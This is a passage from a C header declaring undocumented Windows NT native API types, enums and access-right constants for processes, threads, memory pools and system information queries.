THREAD_CREATE_FLAGS_HAS_SECURITY_DESCRIPTOR 0x00000010 \n#define THREAD_CREATE_FLAGS_ACCESS_CHECK_IN_TARGET  0x00000020\n#define THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE   0x00000040\n#define THREAD_CREATE_FLAGS_INITIAL_THREAD          0x00000080\n\n//\n// Worker Factory Object Access Rights\n//\n#define WORKER_FACTORY_RELEASE_WORKER       0x0001\n#define WORKER_FACTORY_WAIT                 0x0002\n#define WORKER_FACTORY_SET_INFORMATION      0x0004\n#define WORKER_FACTORY_QUERY_INFORMATION    0x0008\n#define WORKER_FACTORY_READY_WORKER         0x0010\n#define WORKER_FACTORY_SHUTDOWN             0x0020\n\n#define WORKER_FACTORY_ALL_ACCESS ( \\\n    STANDARD_RIGHTS_REQUIRED | \\\n    WORKER_FACTORY_RELEASE_WORKER | \\\n    WORKER_FACTORY_WAIT | \\\n    WORKER_FACTORY_SET_INFORMATION | \\\n    WORKER_FACTORY_QUERY_INFORMATION | \\\n    WORKER_FACTORY_READY_WORKER | \\\n    WORKER_FACTORY_SHUTDOWN \\\n    )\n\n//\n// Type Object Access Rights\n//\n#define OBJECT_TYPE_CREATE (0x0001)\n#define OBJECT_TYPE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | OBJECT_TYPE_CREATE)\n\n//\n// WMI Object Access Rights\n//\n#define WMIGUID_QUERY                 0x0001\n#define WMIGUID_SET                   0x0002\n#define WMIGUID_NOTIFICATION          0x0004\n#define WMIGUID_READ_DESCRIPTION      0x0008\n#define WMIGUID_EXECUTE               0x0010\n#define TRACELOG_CREATE_REALTIME      0x0020\n#define TRACELOG_CREATE_ONDISK        0x0040\n#define TRACELOG_GUID_ENABLE          0x0080\n#define TRACELOG_ACCESS_KERNEL_LOGGER 0x0100\n#define TRACELOG_LOG_EVENT            0x0200 // used on Vista and greater\n#define TRACELOG_CREATE_INPROC        0x0200 // used pre-Vista\n#define TRACELOG_ACCESS_REALTIME      0x0400\n#define TRACELOG_REGISTER_GUIDS       0x0800\n#define TRACELOG_JOIN_GROUP           0x1000\n\n//\n// Memory Partition Object Access Rights\n//\n#ifndef MEMORY_PARTITION_QUERY_ACCESS\n#define MEMORY_PARTITION_QUERY_ACCESS  0x0001\n#define MEMORY_PARTITION_MODIFY_ACCESS 
0x0002\n\n#define MEMORY_PARTITION_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED |         \\\n                                     SYNCHRONIZE |                      \\\n                                     MEMORY_PARTITION_QUERY_ACCESS |    \\\n                                     MEMORY_PARTITION_MODIFY_ACCESS)\n#endif\n\n//\n// Define special ByteOffset parameters for read and write operations\n//\n#ifndef FILE_WRITE_TO_END_OF_FILE\n#define FILE_WRITE_TO_END_OF_FILE       0xffffffff\n#endif\n#ifndef FILE_USE_FILE_POINTER_POSITION\n#define FILE_USE_FILE_POINTER_POSITION  0xfffffffe\n#endif\n\n#ifndef FILE_SHARE_VALID_FLAGS\n#define FILE_SHARE_VALID_FLAGS FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE\n#endif\n\n//\n// This is the maximum MaximumLength for a UNICODE_STRING.\n//\n#ifndef MAXUSHORT\n#define MAXUSHORT   0xffff     \n#endif\n#ifndef MAX_USTRING\n#define MAX_USTRING ( sizeof(WCHAR) * (MAXUSHORT/sizeof(WCHAR)) )\n#endif\n\ntypedef struct _EX_RUNDOWN_REF {\n    union\n    {\n        ULONG Count;\n        PVOID Ptr;\n    };\n} EX_RUNDOWN_REF, *PEX_RUNDOWN_REF;\n\n#ifdef _WIN64\n#define MAX_FAST_REFS 15\n#else\n#define MAX_FAST_REFS 7\n#endif\n\ntypedef struct _EX_FAST_REF {\n    union {\n        PVOID Object;\n#if defined (_WIN64)\n        ULONG_PTR RefCnt : 4;\n#else\n        ULONG_PTR RefCnt : 3;\n#endif\n        ULONG_PTR Value;\n    };\n} EX_FAST_REF, *PEX_FAST_REF;\n\ntypedef struct _UNICODE_STRING {\n    USHORT Length;\n    USHORT MaximumLength;\n    PWSTR  Buffer;\n} UNICODE_STRING, *PUNICODE_STRING;\ntypedef const UNICODE_STRING *PCUNICODE_STRING;\n\n#ifndef STATIC_UNICODE_STRING\n#define STATIC_UNICODE_STRING(string, value) \\\n  static UNICODE_STRING string = { sizeof(value) - sizeof(WCHAR), sizeof(value), value };\n#endif\n\ntypedef struct _STRING {\n    USHORT Length;\n    USHORT MaximumLength;\n    PCHAR Buffer;\n} STRING;\ntypedef STRING *PSTRING;\n\ntypedef STRING ANSI_STRING;\ntypedef PSTRING PANSI_STRING;\n\ntypedef STRING 
OEM_STRING;\ntypedef PSTRING POEM_STRING;\ntypedef CONST STRING* PCOEM_STRING;\ntypedef CONST char *PCSZ;\n\ntypedef struct _CSTRING {\n    USHORT Length;\n    USHORT MaximumLength;\n    CONST char *Buffer;\n} CSTRING;\ntypedef CSTRING *PCSTRING;\n#define ANSI_NULL ((CHAR)0)\n\ntypedef STRING CANSI_STRING;\ntypedef PSTRING PCANSI_STRING;\n\ntypedef struct _OBJECT_ATTRIBUTES {\n    ULONG Length;\n    HANDLE RootDirectory;\n    PUNICODE_STRING ObjectName;\n    ULONG Attributes;\n    PVOID SecurityDescriptor;\n    PVOID SecurityQualityOfService;\n} OBJECT_ATTRIBUTES;\ntypedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES;\n\ntypedef struct _IO_STATUS_BLOCK {\n    union {\n        NTSTATUS Status;\n        PVOID Pointer;\n    } DUMMYUNIONNAME;\n\n    ULONG_PTR Information;\n} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;\n\n#ifndef INTERFACE_TYPE\ntypedef enum _INTERFACE_TYPE {\n    InterfaceTypeUndefined = -1,\n    Internal = 0,\n    Isa,\n    Eisa,\n    MicroChannel,\n    TurboChannel,\n    PCIBus,\n    VMEBus,\n    NuBus,\n    PCMCIABus,\n    CBus,\n    MPIBus,\n    MPSABus,\n    ProcessorInternal,\n    InternalPowerBus,\n    PNPISABus,\n    PNPBus,\n    Vmcs,\n    ACPIBus,\n    MaximumInterfaceType\n} INTERFACE_TYPE, * PINTERFACE_TYPE;\n#endif\n\n/*\n** FileCache and MemoryList START\n*/\n\ntypedef enum _SYSTEM_MEMORY_LIST_COMMAND {\n    MemoryCaptureAccessedBits,\n    MemoryCaptureAndResetAccessedBits,\n    MemoryEmptyWorkingSets,\n    MemoryFlushModifiedList,\n    MemoryPurgeStandbyList,\n    MemoryPurgeLowPriorityStandbyList,\n    MemoryCommandMax\n} SYSTEM_MEMORY_LIST_COMMAND;\n\ntypedef struct _SYSTEM_FILECACHE_INFORMATION {\n    SIZE_T CurrentSize;\n    SIZE_T PeakSize;\n    ULONG PageFaultCount;\n    SIZE_T MinimumWorkingSet;\n    SIZE_T MaximumWorkingSet;\n    SIZE_T CurrentSizeIncludingTransitionInPages;\n    SIZE_T PeakSizeIncludingTransitionInPages;\n    ULONG TransitionRePurposeCount;\n    ULONG Flags;\n} SYSTEM_FILECACHE_INFORMATION, 
*PSYSTEM_FILECACHE_INFORMATION;\n\n/*\n** FileCache and MemoryList END\n*/\n\n/*\n** Processes START\n*/\n\ntypedef struct _SYSTEM_TIMEOFDAY_INFORMATION {\n    LARGE_INTEGER BootTime;\n    LARGE_INTEGER CurrentTime;\n    LARGE_INTEGER TimeZoneBias;\n    ULONG TimeZoneId;\n    ULONG Reserved;\n    ULONGLONG BootTimeBias;\n    ULONGLONG SleepTimeBias;\n} SYSTEM_TIMEOFDAY_INFORMATION, *PSYSTEM_TIMEOFDAY_INFORMATION;\n\ntypedef enum _THREAD_STATE {\n    StateInitialized,\n    StateReady,\n    StateRunning,\n    StateStandby,\n    StateTerminated,\n    StateWait,\n    StateTransition,\n    StateUnknown\n} THREAD_STATE;\n\ntypedef enum _KWAIT_REASON {\n    Executive = 0,\n    FreePage,\n    PageIn,\n    PoolAllocation,\n    DelayExecution,\n    Suspended,\n    UserRequest,\n    WrExecutive,\n    WrFreePage,\n    WrPageIn,\n    WrPoolAllocation,\n    WrDelayExecution,\n    WrSuspended,\n    WrUserRequest,\n    WrEventPair, //has no effect after 7\n    WrQueue,\n    WrLpcReceive,\n    WrLpcReply,\n    WrVirtualMemory,\n    WrPageOut,\n    WrRendezvous,\n    WrKeyedEvent,\n    WrTerminated,\n    WrProcessInSwap,\n    WrCpuRateControl,\n    WrCalloutStack,\n    WrKernel,\n    WrResource,\n    WrPushLock,\n    WrMutex,\n    WrQuantumEnd,\n    WrDispatchInt,\n    WrPreempted,\n    WrYieldExecution,\n    WrFastMutex,\n    WrGuardedMutex,\n    WrRundown,\n    WrAlertByThreadId,\n    WrDeferredPreempt,\n    WrPhysicalFault,\n    WrIoRing,\n    WrMdlCache,\n    WrRcu,\n    MaximumWaitReason\n} KWAIT_REASON;\n\ntypedef VOID KSTART_ROUTINE(\n    _In_ PVOID StartContext\n);\ntypedef KSTART_ROUTINE *PKSTART_ROUTINE;\n\ntypedef struct _CLIENT_ID {\n    HANDLE UniqueProcess;\n    HANDLE UniqueThread;\n} CLIENT_ID, *PCLIENT_ID;\n\ntypedef struct _CLIENT_ID64 {\n    ULONG64 UniqueProcess;\n    ULONG64 UniqueThread;\n} CLIENT_ID64, *PCLIENT_ID64;\n\ntypedef struct _CLIENT_ID32 {\n    ULONG32 UniqueProcess;\n    ULONG32 UniqueThread;\n} CLIENT_ID32, *PCLIENT_ID32;\n\ntypedef struct 
_VM_COUNTERS {\n    SIZE_T PeakVirtualSize;\n    SIZE_T VirtualSize;\n    ULONG PageFaultCount;\n    SIZE_T PeakWorkingSetSize;\n    SIZE_T WorkingSetSize;\n    SIZE_T QuotaPeakPagedPoolUsage;\n    SIZE_T QuotaPagedPoolUsage;\n    SIZE_T QuotaPeakNonPagedPoolUsage;\n    SIZE_T QuotaNonPagedPoolUsage;\n    SIZE_T PagefileUsage;\n    SIZE_T PeakPagefileUsage;\n    SIZE_T PrivatePageCount;\n} VM_COUNTERS;\n\ntypedef struct _SYSTEM_THREAD_INFORMATION {\n    LARGE_INTEGER KernelTime;\n    LARGE_INTEGER UserTime;\n    LARGE_INTEGER CreateTime;\n    ULONG WaitTime;\n    PVOID StartAddress;\n    CLIENT_ID ClientId;\n    KPRIORITY Priority;\n    KPRIORITY BasePriority;\n    ULONG ContextSwitchCount;\n    THREAD_STATE State;\n    KWAIT_REASON WaitReason;\n} SYSTEM_THREAD_INFORMATION, *PSYSTEM_THREAD_INFORMATION;\n\ntypedef struct _SYSTEM_EXTENDED_THREAD_INFORMATION {\n    SYSTEM_THREAD_INFORMATION ThreadInfo;\n    PVOID StackBase;\n    PVOID StackLimit;\n    PVOID Win32StartAddress;\n    PVOID TebBase;\n    ULONG_PTR Reserved2;\n    ULONG_PTR Reserved3;\n    ULONG_PTR Reserved4;\n} SYSTEM_EXTENDED_THREAD_INFORMATION, *PSYSTEM_EXTENDED_THREAD_INFORMATION;\n\ntypedef struct _SYSTEM_PROCESS_INFORMATION {\n    ULONG NextEntryDelta;\n    ULONG ThreadCount;\n    LARGE_INTEGER WorkingSetPrivateSize;\n    ULONG HardFaultCount;\n    ULONG NumberOfThreadsHighWatermark;\n    ULONGLONG CycleTime;\n    LARGE_INTEGER CreateTime;\n    LARGE_INTEGER UserTime;\n    LARGE_INTEGER KernelTime;\n    UNICODE_STRING ImageName;\n    KPRIORITY BasePriority;\n    HANDLE UniqueProcessId;\n    HANDLE InheritedFromUniqueProcessId;\n    ULONG HandleCount;\n    ULONG SessionId;\n    ULONG_PTR UniqueProcessKey;\n    VM_COUNTERS VmCounters;\n    IO_COUNTERS IoCounters;\n    SYSTEM_THREAD_INFORMATION Threads[1]; //not a part of this structure\n} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;\n\ntypedef enum _SYSTEM_PROCESS_CLASSIFICATION {\n    SystemProcessClassificationNormal,\n    
SystemProcessClassificationSystem,\n    SystemProcessClassificationSecureSystem,\n    SystemProcessClassificationMemCompression,\n    SystemProcessClassificationRegistry,\n    SystemProcessClassificationMaximum\n} SYSTEM_PROCESS_CLASSIFICATION;\n\ntypedef struct _PROCESS_DISK_COUNTERS {\n    ULONGLONG BytesRead;\n    ULONGLONG BytesWritten;\n    ULONGLONG ReadOperationCount;\n    ULONGLONG WriteOperationCount;\n    ULONGLONG FlushOperationCount;\n} PROCESS_DISK_COUNTERS, *PPROCESS_DISK_COUNTERS;\n\ntypedef union _ENERGY_STATE_DURATION {\n    union\n    {\n        ULONGLONG Value;\n        ULONG LastChangeTime;\n    };\n\n    ULONG Duration : 31;\n    ULONG IsInState : 1;\n} ENERGY_STATE_DURATION, *PENERGY_STATE_DURATION;\n\ntypedef struct _PROCESS_ENERGY_VALUES {\n    ULONGLONG Cycles[2][4];\n    ULONGLONG DiskEnergy;\n    ULONGLONG NetworkTailEnergy;\n    ULONGLONG MBBTailEnergy;\n    ULONGLONG NetworkTxRxBytes;\n    ULONGLONG MBBTxRxBytes;\n    union\n    {\n        ENERGY_STATE_DURATION Durations[3];\n        struct\n        {\n            ENERGY_STATE_DURATION ForegroundDuration;\n            ENERGY_STATE_DURATION DesktopVisibleDuration;\n            ENERGY_STATE_DURATION PSMForegroundDuration;\n        };\n    };\n    ULONG CompositionRendered;\n    ULONG CompositionDirtyGenerated;\n    ULONG CompositionDirtyPropagated;\n    ULONG Reserved1;\n    ULONGLONG AttributedCycles[4][2];\n    ULONGLONG WorkOnBehalfCycles[4][2];\n} PROCESS_ENERGY_VALUES, *PPROCESS_ENERGY_VALUES;\n\ntypedef struct _SYSTEM_PROCESS_INFORMATION_EXTENSION {\n    PROCESS_DISK_COUNTERS DiskCounters;\n    ULONGLONG ContextSwitches;\n    union\n    {\n        ULONG Flags;\n        struct\n        {\n            ULONG HasStrongId : 1;\n            ULONG Classification : 4; // SYSTEM_PROCESS_CLASSIFICATION\n            ULONG BackgroundActivityModerated : 1;\n            ULONG Spare : 26;\n        };\n    };\n    ULONG UserSidOffset;\n    ULONG PackageFullNameOffset;\n    PROCESS_ENERGY_VALUES 
EnergyValues;\n    ULONG AppIdOffset;\n    SIZE_T SharedCommitCharge;\n    ULONG JobObjectId;\n    ULONG SpareUlong;\n    ULONGLONG ProcessSequenceNumber;\n} SYSTEM_PROCESS_INFORMATION_EXTENSION, *PSYSTEM_PROCESS_INFORMATION_EXTENSION;\n\ntypedef struct _SYSTEM_PROCESS_FULL_INFORMATION {\n    SYSTEM_PROCESS_INFORMATION ProcessAndThreads;\n    SYSTEM_PROCESS_INFORMATION_EXTENSION ExtendedInfo;\n} SYSTEM_PROCESS_FULL_INFORMATION, *PSYSTEM_PROCESS_FULL_INFORMATION;\n\ntypedef struct _SYSTEM_PROCESS_ID_INFORMATION {\n    HANDLE ProcessId;\n    UNICODE_STRING ImageName;\n} SYSTEM_PROCESS_ID_INFORMATION, *PSYSTEM_PROCESS_ID_INFORMATION;\n\ntypedef struct _SYSTEM_SECUREBOOT_INFORMATION {\n    BOOLEAN SecureBootEnabled;\n    BOOLEAN SecureBootCapable;\n} SYSTEM_SECUREBOOT_INFORMATION, *PSYSTEM_SECUREBOOT_INFORMATION;\n\ntypedef struct _SYSTEM_SECUREBOOT_POLICY_INFORMATION {\n    GUID PolicyPublisher;\n    ULONG PolicyVersion;\n    ULONG PolicyOptions;\n} SYSTEM_SECUREBOOT_POLICY_INFORMATION, *PSYSTEM_SECUREBOOT_POLICY_INFORMATION;\n\ntypedef struct _SYSTEM_SECUREBOOT_POLICY_FULL_INFORMATION {\n    SYSTEM_SECUREBOOT_POLICY_INFORMATION PolicyInformation;\n    ULONG PolicySize;\n    UCHAR Policy[1];\n} SYSTEM_SECUREBOOT_POLICY_FULL_INFORMATION, *PSYSTEM_SECUREBOOT_POLICY_FULL_INFORMATION;\n\ntypedef struct _SYSTEM_BASIC_INFORMATION {\n    ULONG Reserved;\n    ULONG TimerResolution;\n    ULONG PageSize;\n    ULONG NumberOfPhysicalPages;\n    ULONG LowestPhysicalPageNumber;\n    ULONG HighestPhysicalPageNumber;\n    ULONG AllocationGranularity;\n    ULONG_PTR MinimumUserModeAddress;\n    ULONG_PTR MaximumUserModeAddress;\n    ULONG_PTR ActiveProcessorsAffinityMask;\n    CCHAR NumberOfProcessors;\n} SYSTEM_BASIC_INFORMATION, *PSYSTEM_BASIC_INFORMATION;\n\ntypedef struct _SYSTEM_ISOLATED_USER_MODE_INFORMATION {\n    BOOLEAN SecureKernelRunning : 1;\n    BOOLEAN HvciEnabled : 1;\n    BOOLEAN HvciStrictMode : 1;\n    BOOLEAN DebugEnabled : 1;\n    BOOLEAN FirmwarePageProtection : 
1;\n    BOOLEAN EncryptionKeyAvailable : 1;\n    BOOLEAN SpareFlags : 2;\n    BOOLEAN TrustletRunning : 1;\n    BOOLEAN HvciDisableAllowed : 1;\n    BOOLEAN HardwareEnforcedVbs : 1;\n    BOOLEAN NoSecrets : 1;\n    BOOLEAN EncryptionKeyPersistent : 1;\n    BOOLEAN HardwareEnforcedHvpt : 1;\n    BOOLEAN HardwareHvptAvailable : 1;\n    BOOLEAN SpareFlags2 : 1;\n    BOOLEAN Spare0[6];\n    ULONGLONG Spare1;\n} SYSTEM_ISOLATED_USER_MODE_INFORMATION, *PSYSTEM_ISOLATED_USER_MODE_INFORMATION;\n\ntypedef struct _SYSTEM_PROCESSOR_FEATURES_INFORMATION { //chappell\n    ULONGLONG ProcessorFeatureBits;\n    ULONGLONG Reserved[3];\n} SYSTEM_PROCESSOR_FEATURES_INFORMATION, * PSYSTEM_PROCESSOR_FEATURES_INFORMATION;\n\ntypedef struct _SYSTEM_POOL_ENTRY {\n    BOOLEAN Allocated;\n    BOOLEAN Spare0;\n    USHORT AllocatorBackTraceIndex;\n    ULONG Size;\n    union {\n        UCHAR Tag[4];\n        ULONG TagUlong;\n        PVOID ProcessChargedQuota;\n    };\n} SYSTEM_POOL_ENTRY, * PSYSTEM_POOL_ENTRY;\n\ntypedef struct _SYSTEM_POOL_INFORMATION {\n    SIZE_T TotalSize;\n    PVOID FirstEntry;\n    USHORT EntryOverhead;\n    BOOLEAN PoolTagPresent;\n    BOOLEAN Spare0;\n    ULONG NumberOfEntries;\n    SYSTEM_POOL_ENTRY Entries[1];\n} SYSTEM_POOL_INFORMATION, * PSYSTEM_POOL_INFORMATION;\n\ntypedef struct _SYSTEM_POOLTAG {\n    union {\n        UCHAR Tag[4];\n        ULONG TagUlong;\n    };\n    ULONG PagedAllocs;\n    ULONG PagedFrees;\n    SIZE_T PagedUsed;\n    ULONG NonPagedAllocs;\n    ULONG NonPagedFrees;\n    SIZE_T NonPagedUsed;\n} SYSTEM_POOLTAG, * PSYSTEM_POOLTAG;\n\ntypedef struct _SYSTEM_BIGPOOL_ENTRY {\n    union {\n        PVOID VirtualAddress;\n        ULONG_PTR NonPaged : 1;\n    };\n    SIZE_T SizeInBytes;\n    union {\n        UCHAR Tag[4];\n        ULONG TagUlong;\n    };\n} SYSTEM_BIGPOOL_ENTRY, * PSYSTEM_BIGPOOL_ENTRY;\n\ntypedef struct _SYSTEM_POOLTAG_INFORMATION {\n    ULONG Count;\n    SYSTEM_POOLTAG TagInfo[1];\n} SYSTEM_POOLTAG_INFORMATION, * 
PSYSTEM_POOLTAG_INFORMATION;\n\ntypedef struct _SYSTEM_SESSION_POOLTAG_INFORMATION {\n    SIZE_T NextEntryOffset;\n    ULONG SessionId;\n    ULONG Count;\n    SYSTEM_POOLTAG TagInfo[1];\n} SYSTEM_SESSION_POOLTAG_INFORMATION, * PSYSTEM_SESSION_POOLTAG_INFORMATION;\n\ntypedef struct _SYSTEM_BIGPOOL_INFORMATION {\n    ULONG Count;\n    SYSTEM_BIGPOOL_ENTRY AllocatedInfo[1];\n} SYSTEM_BIGPOOL_INFORMATION, * PSYSTEM_BIGPOOL_INFORMATION;\n\ntypedef struct _SYSTEM_FIRMWARE_PARTITION_INFORMATION {\n    UNICODE_STRING FirmwarePartition; // \\Device\\HarddiskX\n} SYSTEM_FIRMWARE_PARTITION_INFORMATION, * PSYSTEM_FIRMWARE_PARTITION_INFORMATION;\n\ntypedef struct _RTL_PROCESS_BACKTRACE_INFORMATION {\n    PCHAR SymbolicBackTrace;\n    ULONG TraceCount;\n    USHORT Index;\n    USHORT Depth;\n    PVOID BackTrace[32];\n} RTL_PROCESS_BACKTRACE_INFORMATION, * PRTL_PROCESS_BACKTRACE_INFORMATION;\n\ntypedef struct _RTL_PROCESS_BACKTRACES {\n    ULONG CommittedMemory;\n    ULONG ReservedMemory;\n    ULONG NumberOfBackTraceLookups;\n    ULONG NumberOfBackTraces;\n    RTL_PROCESS_BACKTRACE_INFORMATION BackTraces[1];\n} RTL_PROCESS_BACKTRACES, * PRTL_PROCESS_BACKTRACES;\n\ntypedef enum _PROCESSINFOCLASS {\n    ProcessBasicInformation = 0,\n    ProcessQuotaLimits = 1,\n    ProcessIoCounters = 2,\n    ProcessVmCounters = 3,\n    ProcessTimes = 4,\n    ProcessBasePriority = 5,\n    ProcessRaisePriority = 6,\n    ProcessDebugPort = 7,\n    ProcessExceptionPort = 8,\n    ProcessAccessToken = 9,\n    ProcessLdtInformation = 10,\n    ProcessLdtSize = 11,\n    ProcessDefaultHardErrorMode = 12,\n    ProcessIoPortHandlers = 13,\n    ProcessPooledUsageAndLimits = 14,\n    ProcessWorkingSetWatch = 15,\n    ProcessUserModeIOPL = 16,\n    ProcessEnableAlignmentFaultFixup = 17,\n    ProcessPriorityClass = 18,\n    ProcessWx86Information = 19,\n    ProcessHandleCount = 20,\n    ProcessAffinityMask = 21,\n    ProcessPriorityBoost = 22,\n    ProcessDeviceMap = 23,\n    ProcessSessionInformation = 24,\n    
ProcessForegroundInformation = 25,\n    ProcessWow64Information = 26,\n    ProcessImageFileName = 27,\n    ProcessLUIDDeviceMapsEnabled = 28,\n    ProcessBreakOnTermination = 29,\n    ProcessDebugObjectHandle = 30,\n    ProcessDebugFlags = 31,\n    ProcessHandleTracing = 32,\n    ProcessIoPriority = 33,\n    ProcessExecuteFlags = 34,\n    ProcessTlsInformation = 35,\n    ProcessCookie = 36,\n    ProcessImageInformation = 37,\n    ProcessCycleTime = 38,\n    ProcessPagePriority = 39,\n    ProcessInstrumentationCallback = 40,\n    ProcessThreadStackAllocation = 41,\n    ProcessWorkingSetWatchEx = 42,\n    ProcessImageFileNameWin32 = 43,\n    ProcessImageFileMapping = 44,\n    ProcessAffinityUpdateMode = 45,\n    ProcessMemoryAllocationMode = 46,\n    ProcessGroupInformation = 47,\n    ProcessTokenVirtualizationEnabled = 48,\n    ProcessConsoleHostProcess = 49, //ProcessOwnerInformation\n    ProcessWindowInformation = 50,\n    ProcessHandleInformation = 51,\n    ProcessMitigationPolicy = 52,\n    ProcessDynamicFunctionTableInformation = 53,\n    ProcessHandleCheckingMode = 54,\n    ProcessKeepAliveCount = 55,\n    ProcessRevokeFileHandles = 56,\n    ProcessWorkingSetControl = 57,\n    ProcessHandleTable = 58,\n    ProcessCheckStackExtentsMode = 59,\n    ProcessCommandLineInformation = 60,\n    ProcessProtectionInformation = 61,\n    ProcessMemoryExhaustion = 62,\n    ProcessFaultInformation = 63,\n    ProcessTelemetryIdInformation = 64,\n    ProcessCommitReleaseInformation = 65,\n    ProcessDefaultCpuSetsInformation = 66,\n    ProcessAllowedCpuSetsInformation = 67,\n    ProcessSubsystemProcess = 68,\n    ProcessJobMemoryInformation = 69,\n    ProcessInPrivate = 70,\n    ProcessRaiseUMExceptionOnInvalidHandleClose = 71,\n    ProcessIumChallengeResponse = 72,\n    ProcessChildProcessInformation = 73,\n    ProcessHighGraphicsPriorityInformation = 74,\n    ProcessSubsystemInformation = 75,\n    ProcessEnergyValues = 76,\n    ProcessActivityThrottleState = 77,\n    
ProcessActivityThrottlePolicy = 78,\n    ProcessWin32kSyscallFilterInformation = 79,\n    ProcessDisableSystemAllowedCpuSets = 80,\n    ProcessWakeInformation = 81,\n    ProcessEnergyTrackingState = 82,\n    ProcessManageWritesToExecutableMemory = 83,\n    ProcessCaptureTrustletLiveDump = 84,\n    ProcessTelemetryCoverage = 85,\n    ProcessEnclaveInformation = 86,\n    ProcessEnableReadWriteVmLogging = 87,\n    ProcessUptimeInformation = 88,\n    ProcessImageSection = 89,\n    ProcessDebugAuthInformation = 90,\n    ProcessSystemResourceManagement = 91,\n    ProcessSequenceNumber = 92,\n    ProcessLoaderDetour = 93,\n    ProcessSecurityDomainInformation = 94,\n    ProcessCombineSecurityDomainsInformation = 95,\n    ProcessEnableLogging = 96,\n    ProcessLeapSecondInformation = 97,\n    ProcessFiberShadowStackAllocation = 98,\n    ProcessFreeFiberShadowStackAllocation = 99,\n    ProcessAltSystemCallInformation = 100,\n    ProcessDynamicEHContinuationTargets = 101,\n    ProcessDynamicEnforcedCetCompatibleRanges = 102,\n    ProcessCreateStateChange = 103,\n    ProcessApplyStateChange = 104,\n    ProcessEnableOptionalXStateFeatures = 105,\n    ProcessAltPrefetchParam = 106,\n    ProcessAssignCpuPartitions = 107,\n    ProcessPriorityClassEx = 108,\n    ProcessMembershipInformation = 109,\n    ProcessEffectiveIoPriority = 110,\n    ProcessEffectivePagePriority = 111,\n    ProcessSchedulerSharedData = 112,\n    ProcessSlistRollbackInformation = 113,\n    ProcessNetworkIoCounters = 114,\n    ProcessFindFirstThreadByTebValue = 115,\n    ProcessEnclaveAddressSpaceRestriction = 116,\n    ProcessAvailableCpus = 117,\n    MaxProcessInfoClass\n} PROCESSINFOCLASS;\n\ntypedef enum _THREADINFOCLASS {\n    ThreadBasicInformation,\n    ThreadTimes,\n    ThreadPriority,\n    ThreadBasePriority,\n    ThreadAffinityMask,\n    ThreadImpersonationToken,\n    ThreadDescriptorTableEntry,\n    ThreadEnableAlignmentFaultFixup,\n    ThreadEventPair,\n    ThreadQuerySetWin32StartAddress,\n    
ThreadZeroTlsCell,\n    ThreadPerformanceCount,\n    ThreadAmILastThread,\n    ThreadIdealProcessor,\n    ThreadPriorityBoost,\n    ThreadSetTlsArrayAddress,\n    ThreadIsIoPending,\n    ThreadHideFromDebugger,\n    ThreadBreakOnTermination,\n    ThreadSwitchLegacyState,\n    ThreadIsTerminated,\n    ThreadLastSystemCall,\n    ThreadIoPriority,\n    ThreadCycleTime,\n    ThreadPagePriority,\n    ThreadActualBasePriority,\n    ThreadTebInformation,\n    ThreadCSwitchMon,\n    ThreadCSwitchPmu,\n    ThreadWow64Context,\n    ThreadGroupInformation,\n    ThreadUmsInformation,\n    ThreadCounterProfiling,\n    ThreadIdealProcessorEx,\n    ThreadCpuAccountingInformation,\n    ThreadSuspendCount,\n    ThreadHeterogeneousCpuPolicy,\n    ThreadContainerId,\n    ThreadNameInformation,\n    ThreadSelectedCpuSets,\n    ThreadSystemThreadInformation,\n    ThreadActualGroupAffinity,\n    ThreadDynamicCodePolicyInfo,\n    ThreadExplicitCaseSensitivity,\n    ThreadWorkOnBehalfTicket,\n    ThreadSubsystemInformation,\n    ThreadDbgkWerReportActive,\n    ThreadAttachContainer,\n    ThreadManageWritesToExecutableMemory,\n    ThreadPowerThrottlingState,\n    ThreadWorkloadClass,\n    ThreadCreateStateChange,\n    ThreadApplyStateChange,\n    ThreadStrongerBadHandleChecks,\n    ThreadEffectiveIoPriority,\n    ThreadEffectivePagePriority,\n    ThreadUpdateLockOwnership,\n    ThreadSchedulerSharedDataSlot,\n    ThreadTebInformationAtomic,\n    ThreadIndexInformation,\n    MaxThreadInfoClass\n} THREADINFOCLASS;\n\ntypedef struct _PROCESS_BASIC_INFORMATION {\n    NTSTATUS ExitStatus;\n    PVOID PebBaseAddress;\n    ULONG_PTR AffinityMask;\n    KPRIORITY BasePriority;\n    ULONG_PTR UniqueProcessId;\n    ULONG_PTR InheritedFromUniqueProcessId;\n} PROCESS_BASIC_INFORMATION, *PPROCESS_BASIC_INFORMATION;\n\ntypedef struct _THREAD_BASIC_INFORMATION {\n    NTSTATUS ExitStatus;\n    PVOID TebBaseAddress;\n    CLIENT_ID ClientId;\n    ULONG_PTR AffinityMask;\n    KPRIORITY Priority;\n    LONG 
BasePriority;\n} THREAD_BASIC_INFORMATION, *PTHREAD_BASIC_INFORMATION;\n\n// taken from ph2(whatever)\ntypedef struct _THREAD_LAST_SYSCALL_INFORMATION {\n    PVOID FirstArgument;\n    USHORT SystemCallNumber;\n#ifdef WIN64\n    USHORT Pad[0x3]; // since REDSTONE2\n#else\n    USHORT Pad[0x1]; // since REDSTONE2\n#endif\n    ULONG64 WaitTime;\n} THREAD_LAST_SYSCALL_INFORMATION, * PTHREAD_LAST_SYSCALL_INFORMATION;\n\ntypedef struct _THREAD_NAME_INFORMATION {\n    UNICODE_STRING ThreadName;\n} THREAD_NAME_INFORMATION, * PTHREAD_NAME_INFORMATION;\n\ntypedef struct _PROCESS_EXTENDED_BASIC_INFORMATION {\n    SIZE_T Size;\n    PROCESS_BASIC_INFORMATION BasicInfo;\n    union\n    {\n        ULONG Flags;\n        struct\n        {\n            ULONG IsProtectedProcess : 1;\n            ULONG IsWow64Process : 1;\n            ULONG IsProcessDeleting : 1;\n            ULONG IsCrossSessionCreate : 1;\n            ULONG IsFrozen : 1;\n            ULONG IsBackground : 1;\n            ULONG IsStronglyNamed : 1;\n            ULONG IsSecureProcess : 1;\n            ULONG IsSubsystemProcess : 1;\n            ULONG SpareBits : 23;\n        } DUMMYSTRUCTNAME;\n    } DUMMYUNIONNAME;\n} PROCESS_EXTENDED_BASIC_INFORMATION, *PPROCESS_EXTENDED_BASIC_INFORMATION;\n\ntypedef struct _PROCESS_ACCESS_TOKEN {\n    HANDLE Token;\n    HANDLE Thread;\n} PROCESS_ACCESS_TOKEN, 